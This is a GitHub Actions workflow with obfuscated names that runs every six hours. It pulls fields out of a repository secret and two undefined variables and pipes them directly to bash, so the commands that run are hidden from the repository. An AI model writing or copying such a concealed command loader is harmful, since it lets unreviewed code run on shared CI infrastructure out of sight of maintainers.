name: gaoruye2167

on:
  workflow_dispatch:
  schedule:
    - cron: '12 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaoruye2167
        env:
          w21420: ${{ secrets.w21420 }}
        run: |
          echo $w21420 | jq -r .st9019 | /bin/bash
          echo $k93208 | jq -r .pxik77339 | /bin/bash
          echo $zgxpj099 | jq -r .ux6 | /bin/bash

